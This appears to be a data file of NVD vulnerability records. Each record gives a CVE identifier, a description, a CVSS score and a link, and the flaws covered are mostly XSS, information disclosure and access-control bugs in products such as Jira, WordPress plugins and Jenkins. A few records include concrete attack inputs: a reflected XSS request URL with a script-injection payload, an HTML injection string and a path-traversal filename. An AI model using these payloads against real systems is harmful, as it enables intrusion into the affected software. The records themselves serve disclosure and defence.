CVE-2021-30119 Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=--redacted--` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=";</script><script>alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-30119
CVE-2021-29105 A stored Cross Site Scripting (XSS) vulnerability in Esri ArcGIS Server Services Directory version 10.8.1 and below may allow a remote authenticated attacker to pass and store malicious strings in the ArcGIS Services Directory. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-29105
CVE-2021-26082 The XML Export in Atlassian Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.17.0 allows remote attackers to inject arbitrary HTML or JavaScript via a stored cross site scripting vulnerability. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-26082
CVE-2021-26083 Export HTML Report in Atlassian Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-26083
CVE-2021-29110 Stored cross-site scripting (XSS) issue in Esri Portal for ArcGIS may allow a remote unauthenticated attacker to pass and store malicious strings in the home application. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-29110
CVE-2021-41164 CKEditor4 is an open source WYSIWYG HTML editor. In affected versions a vulnerability has been discovered in the Advanced Content Filter (ACF) module and may affect all plugins used by CKEditor 4. The vulnerability allowed to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.17.0. The problem has been recognized and patched. The fix will be available in version 4.17.0. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-41164
CVE-2021-41165 CKEditor4 is an open source WYSIWYG HTML editor. In affected version a vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4. The vulnerability allowed to inject malformed comments HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.17.0. The problem has been recognized and patched. The fix will be available in version 4.17.0. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-41165
CVE-2021-44225 In Keepalived through 2.2.4, the D-Bus policy does not sufficiently restrict the message destination, allowing any user to inspect and manipulate any property. This leads to access-control bypass in some situations in which an unrelated D-Bus system service has a settable (writable) property 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-44225
CVE-2021-35490 Thruk before 2.44 allows XSS for a quick command. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-35490
CVE-2021-23225 Cacti 1.1.38 allows authenticated users with User Management permissions to inject arbitrary web script or HTML in the "new_username" field during creation of a new user via "Copy" method at user_admin.php. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-23225
CVE-2021-46108 D-Link DSL-2730E CT-20131125 devices allow XSS via the username parameter to the password page in the maintenance configuration. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-46108
CVE-2022-0726 Improper Authorization in GitHub repository chocobozzz/peertube prior to 4.1.0. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-0726
CVE-2021-24958 The Meks Easy Photo Feed Widget WordPress plugin before 1.2.4 does not have capability and CSRF checks in the meks_save_business_selected_account AJAX action, available to any authenticated user, and does not escape some of the settings. As a result, any authenticated user, such as subscriber could update the plugin's settings and put Cross-Site Scripting payloads in them 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-24958
CVE-2022-25606 Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions <= 1.68.6). Vulnerable parameters &download_path, &download_path_url, &download_page_url, &download_categories. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-25606
CVE-2022-25611 Authenticated Stored Cross-Site Scripting (XSS) in Simple Event Planner plugin <= 1.5.4 allows attackers with contributor or higher user roles to inject the malicious script by using vulnerable parameter &custom[add_seg][]. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-25611
CVE-2022-25612 Multiple Authenticated Persistent Cross-Site Scripting (XSS) vulnerabilities in Simple Event Planner WordPress plugin <= 1.5.4 allows user with author or higher user rights inject the malicious code via vulnerable parameters: &custom[event_organiser], &custom[organiser_email], &custom[organiser_contact]. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-25612
CVE-2021-44211 OX App Suite through 7.10.5 allows XSS via the class attribute of an element in an HTML e-mail signature. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-44211
CVE-2022-0397 The WPC Smart Wishlist for WooCommerce WordPress plugin before 2.9.4 does not sanitise and escape the key parameter before outputting it back in the wishlist_quickview AJAX action's response (available to any authenticated user), leading to a Reflected Cross-Site Scripting 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-0397
CVE-2022-0450 The Menu Image, Icons made easy WordPress plugin before 3.0.8 does not have authorisation and CSRF checks when saving menu settings, and does not validate, sanitise and escape them. As a result, any authenticate users, such as subscriber can update the settings or arbitrary menu and put Cross-Site Scripting payloads in them which will be triggered in the related menu in the frontend 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-0450
CVE-2022-0595 The Drag and Drop Multiple File Upload WordPress plugin before 1.3.6.3 allows SVG files to be uploaded by default via the dnd_codedropz_upload AJAX action, which could lead to Stored Cross-Site Scripting issue 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-0595
CVE-2022-0720 The Amelia WordPress plugin before 1.0.47 does not have proper authorisation when managing appointments, allowing any customer to update other's booking, as well as retrieve sensitive information about the bookings, such as the full name and phone number of the person who booked it. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-0720
CVE-2021-45866 A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Student Attendance Management System 1.0 via the couse filed in index.php. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2021-45866
CVE-2022-24957 DHC Vision eQMS through 5.4.8.322 has Persistent XSS due to insufficient encoding of untrusted input/output. To exploit the vulnerability, the attacker has to create or edit a new information object and use the XSS payload as the name. Any user that opens the object's version or history tab will be attacked. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-24957
CVE-2022-1074 A vulnerability has been found in TEM FLEX-1085 1.6.0 and classified as problematic. Using the input <h1>HTML Injection</h1> in the WiFi settings of the dashboard leads to html injection. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-1074
CVE-2022-1075 A vulnerability was found in College Website Management System 1.0 and classified as problematic. Affected by this issue is the file /cwms/classes/Master.php?f=save_contact of the component Contact Handler. The manipulation leads to persistent cross site scripting. The attack may be launched remotely and requires authentication. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-1075
CVE-2022-1086 A vulnerability was found in DolphinPHP up to 1.5.0 and classified as problematic. Affected by this issue is the User Management Page. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-1086
CVE-2022-1087 A vulnerability, which was classified as problematic, has been found in htmly 5.3 whis affects the component Edit Profile Module. The manipulation of the field Title with script tags leads to persistent cross site scripting. The attack may be initiated remotely and requires an authentication. A simple POC has been disclosed to the public and may be used. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-1087
CVE-2022-23059 A Stored Cross Site Scripting (XSS) vulnerability exists in Shopizer versions v2.0.2 through v2.17.0 via the “Manage Images” tab, which allows an attacker to upload a SVG file containing malicious JavaScript code. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-23059
CVE-2022-23903 A Cross Site Scripting (XSS) vulnerability exists in pearadmin pear-admin-think <=5.0.6, which allows a login account to access arbitrary functions and cause stored XSS through a fake User-Agent. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-23903
CVE-2022-28133 Jenkins Bitbucket Server Integration Plugin 3.1.0 and earlier does not limit URL schemes for callback URLs on OAuth consumers, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create BitBucket Server consumers. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-28133
CVE-2022-28134 Jenkins Bitbucket Server Integration Plugin 3.1.0 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to create, view, and delete BitBucket Server consumers. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-28134
CVE-2022-28145 Jenkins Continuous Integration with Toad Edge Plugin 2.3 and earlier does not apply Content-Security-Policy headers to report files it serves, resulting in a stored cross-site scripting (XSS) exploitable by attackers with Item/Configure permission or otherwise able to control report contents. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-28145
CVE-2022-28149 Jenkins Job and Node ownership Plugin 0.13.0 and earlier does not escape the names of the secondary owners, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-28149
CVE-2022-28153 Jenkins SiteMonitor Plugin 0.6 and earlier does not escape URLs of sites to monitor in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-28153
CVE-2022-28159 Jenkins Tests Selector Plugin 1.3.3 and earlier does not escape the Properties File Path option for Choosing Tests parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-28159
CVE-2022-26244 A stored cross-site scripting (XSS) vulnerability in Hospital Patient Record Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "special" field. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-26244
CVE-2022-26947 Archer 6.x through 6.9 SP3 (6.9.3.0) contains a reflected XSS vulnerability. A remote authenticated malicious Archer user could potentially exploit this vulnerability by tricking a victim application user into supplying malicious HTML or JavaScript code to the vulnerable web application; the malicious code is then reflected back to the victim and gets executed by the web browser in the context of the vulnerable web application. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-26947
CVE-2022-1178 Stored Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.4. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-1178
CVE-2022-1179 Non-Privilege User Can Created New Rule and Lead to Stored Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.4. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-1179
CVE-2022-1181 Stored Cross Site Scripting in GitHub repository openemr/openemr prior to 6.0.0.2. 5.4 https://nvd.nist.gov/vuln/detail/CVE-2022-1181
CVE-2019-13161 An issue was discovered in Asterisk Open Source through 13.27.0, 14.x and 15.x through 15.7.2, and 16.x through 16.4.0, and Certified Asterisk through 13.21-cert3. A pointer dereference in chan_sip while handling SDP negotiation allows an attacker to crash Asterisk when handling an SDP answer to an outgoing T.38 re-invite. To exploit this vulnerability an attacker must cause the chan_sip module to send a T.38 re-invite request to them. Upon receipt, the attacker must send an SDP answer containing both a T.38 UDPTL stream and another media stream containing only a codec (which is not permitted according to the chan_sip configuration). 5.3 https://nvd.nist.gov/vuln/detail/CVE-2019-13161
CVE-2019-16738 In MediaWiki through 1.33.0, Special:Redirect allows information disclosure of suppressed usernames via a User ID Lookup. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2019-16738
CVE-2019-20403 The API in Atlassian Jira Server and Data Center before version 8.6.0 allows remote attackers to determine if a Jira project key exists or not via an information disclosure vulnerability. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2019-20403
CVE-2019-19799 Zoho ManageEngine Applications Manager before 14600 allows a remote unauthenticated attacker to disclose license related information via WieldFeedServlet servlet. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2019-19799
CVE-2020-9801 A logic issue was addressed with improved restrictions. This issue is fixed in Safari 13.1.1. A malicious process may cause Safari to launch an application. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2020-9801
CVE-2020-9856 This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.5. An application may be able to gain elevated privileges. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2020-9856
CVE-2019-20412 The Convert Sub-Task to Issue page in affected versions of Atlassian Jira Server and Data Center allow remote attackers to enumerate the following information via an Improper Authentication vulnerability: Workflow names; Project Key, if it is part of the workflow name; Issue Keys; Issue Types; Status Types. The affected versions are before version 7.13.9, and from version 8.0.0 before 8.4.2. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2019-20412
CVE-2019-20899 The Gadget API in Atlassian Jira Server and Data Center in affected versions allows remote attackers to make Jira unresponsive via repeated requests to a certain endpoint in the Gadget API. The affected versions are before version 8.5.4, and from version 8.6.0 before 8.6.1. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2019-20899
CVE-2021-2006 Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 8.0.19 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H). 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-2006
CVE-2020-29582 In JetBrains Kotlin before 1.4.21, a vulnerable Java API was used for temporary file and folder creation. An attacker was able to read data from such files and list directories due to insecure permissions. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2020-29582
CVE-2020-29453 The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center before version 8.5.11, from 8.6.0 before 8.13.3, and from 8.14.0 before 8.15.0 allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2020-29453
CVE-2021-28116 Squid through 4.14 and 5.x through 5.0.5, in some configurations, allows information disclosure because of an out-of-bounds read in WCCP protocol data. This can be leveraged as part of a chain for remote code execution as nobody. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-28116
CVE-2021-26069 Affected versions of Atlassian Jira Server and Data Center allow unauthenticated remote attackers to download temporary files and enumerate project keys via an Information Disclosure vulnerability in the /rest/api/1.0/issues/{id}/ActionsAndOperations API endpoint. The affected versions are before version 8.5.11, from version 8.6.0 before 8.13.3, and from version 8.14.0 before 8.15.0. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-26069
CVE-2020-36238 The /rest/api/1.0/render resource in Jira Server and Data Center before version 8.5.13, from version 8.6.0 before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to determine if a username is valid or not via a missing permissions check. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2020-36238
CVE-2020-36286 The membersOf JQL search function in Jira Server and Data Center before version 8.5.13, from version 8.6.0 before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to determine if a group exists & members of groups if they are assigned to publicly visible issue field. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2020-36286
CVE-2020-36287 The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2020-36287
CVE-2021-29471 Synapse is a Matrix reference homeserver written in python (pypi package matrix-synapse). Matrix is an ecosystem for open federated Instant Messaging and VoIP. In Synapse before version 1.33.2 "Push rules" can specify conditions under which they will match, including `event_match`, which matches event content against a pattern including wildcards. Certain patterns can cause very poor performance in the matching engine, leading to a denial-of-service when processing moderate length events. The issue is patched in version 1.33.2. A potential workaround might be to prevent users from making custom push rules, by blocking such requests at a reverse-proxy. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-29471
CVE-2020-36289 Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2020-36289
CVE-2021-29099 A SQL injection vulnerability exists in some configurations of ArcGIS Server versions 10.8.1 and earlier. Specially crafted web requests can expose information that is not intended to be disclosed (not customer datasets). Web Services that use file based data sources (file Geodatabase or Shape Files or tile cached services) are unaffected by this issue. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-29099
CVE-2021-26081 REST API in Atlassian Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1 allows remote attackers to enumerate usernames via a Sensitive Data Exposure vulnerability in the `/rest/api/latest/user/avatar/temporary` endpoint. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-26081
CVE-2021-36942 Windows LSA Spoofing Vulnerability 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-36942
CVE-2021-26086 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-26086
CVE-2021-39122 Affected versions of Atlassian Jira Server and Data Center allow anonymous remote attackers to view users' emails via an Information Disclosure vulnerability in the /rest/api/2/search endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-39122
CVE-2021-35655 Vulnerability in the Essbase Administration Services product of Oracle Essbase (component: EAS Console). The supported versions that are affected are Prior to 11.1.2.4.046 and Prior to 21.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Essbase Administration Services. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Essbase Administration Services accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-35655
CVE-2021-39127 Affected versions of Atlassian Jira Server and Data Center allow anonymous remote attackers to the query component JQL endpoint via a Broken Access Control vulnerability (BAC) vulnerability. The affected versions are before version 8.5.10, and from version 8.6.0 before 8.13.1. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-39127
CVE-2021-42374 An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-42374
CVE-2021-29115 An information disclosure vulnerability in the ArcGIS Service Directory in Esri ArcGIS Enterprise versions 10.9.0 and below may allows a remote attacker to view hidden field names in feature layers. This issue may reveal field names, but not not disclose features. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-29115
CVE-2021-34141 An incomplete string comparison in the numpy.core component in NumPy before 1.22.0 allows attackers to trigger slightly incorrect copying by constructing specific string objects. NOTE: the vendor states that this reported code behavior is "completely harmless." 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-34141
CVE-2022-21283 Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). 5.3 https://nvd.nist.gov/vuln/detail/CVE-2022-21283
CVE-2022-21291 Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). 5.3 https://nvd.nist.gov/vuln/detail/CVE-2022-21291
CVE-2022-21293 Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). 5.3 https://nvd.nist.gov/vuln/detail/CVE-2022-21293
CVE-2021-27420 GE UR firmware versions prior to version 8.1x web server task does not properly handle receipt of unsupported HTTP verbs, resulting in the web server becoming temporarily unresponsive after receiving a series of unsupported HTTP requests. When unresponsive, the web server is inaccessible. By itself, this is not particularly significant as the relay remains effective in all other functionality and communication channels. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-27420
CVE-2021-27424 GE UR firmware versions prior to version 8.1x shares MODBUS memory map as part of the communications guide. GE was made aware a “Last-key pressed” MODBUS register can be used to gain unauthorized information. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-27424
CVE-2022-27254 The remote keyless system on Honda Civic 2018 vehicles sends the same RF signal for each door-open request, which allows for a replay attack, a related issue to CVE-2019-20626. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2022-27254
CVE-2021-44751 A vulnerability affecting F-Secure SAFE browser was discovered. A maliciously crafted website attached with USSD code in JavaScript or iFrame can trigger dialer application from F-Secure browser which can be exploited by an attacker to send unwanted USSD messages or perform unwanted calls. In most modern Android OS, dialer application will require user interaction, however, some older Android OS may not need user interaction. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-44751
CVE-2021-22100 In cloud foundry CAPI versions prior to 1.122, a denial-of-service attack in which a developer can push a service broker that (accidentally or maliciously) causes CC instances to timeout and fail is possible. An attacker can leverage this vulnerability to cause an inability for anyone to push or manage apps. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-22100
CVE-2022-26254 WoWonder The Ultimate PHP Social Network Platform v4.0.0 was discovered to contain an access control issue which allows unauthenticated attackers to arbitrarily change group ID names. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2022-26254
CVE-2021-26598 ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token). 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-26598
CVE-2021-24978 The OSMapper WordPress plugin through 2.1.5 contains an AJAX action to delete a plugin related post type named 'map' and is registered with the wp_ajax_nopriv prefix, making it available to unauthenticated users. There is no authorisation, CSRF and checks in place to ensure that the post to delete is a map one. As a result, unauthenticated user can delete arbitrary posts from the blog 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-24978
CVE-2021-4191 An issue has been discovered in GitLab CE/EE affecting versions 13.0 to 14.6.5, 14.7 to 14.7.4, and 14.8 to 14.8.2. Private GitLab instances with restricted sign-ups may be vulnerable to user enumeration to unauthenticated users through the GraphQL API. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2021-4191
CVE-2022-0331 An information disclosure vulnerability in Webadmin allows an unauthenticated remote attacker to read the device serial number in Sophos Firewall version v18.5 MR2 and older. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2022-0331
CVE-2022-23794 An issue was discovered in Joomla! 3.0.0 through 3.10.6 & 4.0.0 through 4.1.0. Uploading a file name of an excess length causes the error. This error brings up the screen with the path of the source code of the web application. 5.3 https://nvd.nist.gov/vuln/detail/CVE-2022-23794
CVE-2020-1733 A race condition flaw was found in Ansible Engine 2.7.17 and prior, 2.8.9 and prior, 2.9.6 and prior when running a playbook with an unprivileged become user. When Ansible needs to run a module with become user, the temporary directory is created in /var/tmp. This directory is created with "umask 77 && mkdir -p <dir>"; this operation does not fail if the directory already exists and is owned by another user. An attacker could take advantage to gain control of the become user as the target directory can be retrieved by iterating '/proc/<pid>/cmdline'. 5 https://nvd.nist.gov/vuln/detail/CVE-2020-1733
CVE-2020-36232 The MessageBundleWhiteList class of atlassian-gadgets before version 4.2.37, from version 4.3.0 before 4.3.14, from version 4.3.2.0 before 4.3.2.4, from version 4.4.0 before 4.4.12, and from version 5.0.0 before 5.0.1 allowed unexpected DNS lookups and requests to arbitrary services as it incorrectly obtained application base url information from the executing http request which could be attacker controlled. 5 https://nvd.nist.gov/vuln/detail/CVE-2020-36232
CVE-2022-21718 Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. A vulnerability in versions prior to `17.0.0-alpha.6`, `16.0.6`, `15.3.5`, `14.2.4`, and `13.6.6` allows renderers to obtain access to a bluetooth device via the web bluetooth API if the app has not configured a custom `select-bluetooth-device` event handler. This has been patched and Electron versions `17.0.0-alpha.6`, `16.0.6`, `15.3.5`, `14.2.4`, and `13.6.6` contain the fix. Code from the GitHub Security Advisory can be added to the app to work around the issue. 5 https://nvd.nist.gov/vuln/detail/CVE-2022-21718
CVE-2022-1172 Null Pointer Dereference Caused Segmentation Fault in GitHub repository gpac/gpac prior to 2.1.0-DEV. 5 https://nvd.nist.gov/vuln/detail/CVE-2022-1172
CVE-2021-28700 xen/arm: No memory limit for dom0less domUs The dom0less feature allows an administrator to create multiple unprivileged domains directly from Xen. Unfortunately, the memory limit from them is not set. This allow a domain to allocate memory beyond what an administrator originally configured. 4.9 https://nvd.nist.gov/vuln/detail/CVE-2021-28700
CVE-2022-24731 Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Argo CD starting with version 1.5.0 but before versions 2.1.11, 2.2.6, and 2.3.0 is vulnerable to a path traversal vulnerability, allowing a malicious user with read/write access to leak sensitive files from Argo CD's repo-server. A malicious Argo CD user who has been granted `create` or `update` access to Applications can leak the contents of any text file on the repo-server. By crafting a malicious Helm chart and using it in an Application, the attacker can retrieve the sensitive file's contents either as part of the generated manifests or in an error message. The attacker would have to know or guess the location of the target file. Sensitive files which could be leaked include files from another Application's source repositories or any secrets which have been mounted as files on the repo-server. This vulnerability is patched in Argo CD versions 2.1.11, 2.2.6, and 2.3.0. The problem can be mitigated by avoiding storing secrets in git, avoiding mounting secrets as files on the repo-server, avoiding decrypting secrets into files on the repo-server, and carefully limiting who can `create` or `update` Applications. 4.9 https://nvd.nist.gov/vuln/detail/CVE-2022-24731
CVE-2022-0493 The String locator WordPress plugin before 2.5.0 does not properly validate the path of the files to be searched, allowing high privilege users such as admin to query arbitrary files on the web server via a path traversal vector. Furthermore, due to a flaw in the search, allowing a pattern to be provided, which will be used to output the relevant matches from the matching file, all content of the file can be disclosed. 4.9 https://nvd.nist.gov/vuln/detail/CVE-2022-0493
CVE-2021-43099 An Archive Extraction (AKA "Zip Slip) vulnerability exists in bbs 5.3 in the UpgradeNow function in UpgradeManageAction.java, which unzips the arbitrary upladed zip file without checking filenames. The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../evil.exe). 4.9 https://nvd.nist.gov/vuln/detail/CVE-2021-43099
CVE-2020-4025 The attachment download resource in Atlassian Jira Server and Data Center The attachment download resource in Atlassian Jira Server and Data Center before 8.5.5, and from 8.6.0 before 8.8.2, and from 8.9.0 before 8.9.1 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability issue attachments with a rdf content type. 4.8 https://nvd.nist.gov/vuln/detail/CVE-2020-4025
CVE-2019-20900 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the Add Field module. The affected versions are before version 8.7.0. 4.8 https://nvd.nist.gov/vuln/detail/CVE-2019-20900
CVE-2020-36234 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in the Screens Modal view. The affected versions are before version 8.5.11, from version 8.6.0 before 8.13.3, and from version 8.14.0 before 8.15.0. 4.8 https://nvd.nist.gov/vuln/detail/CVE-2020-36234
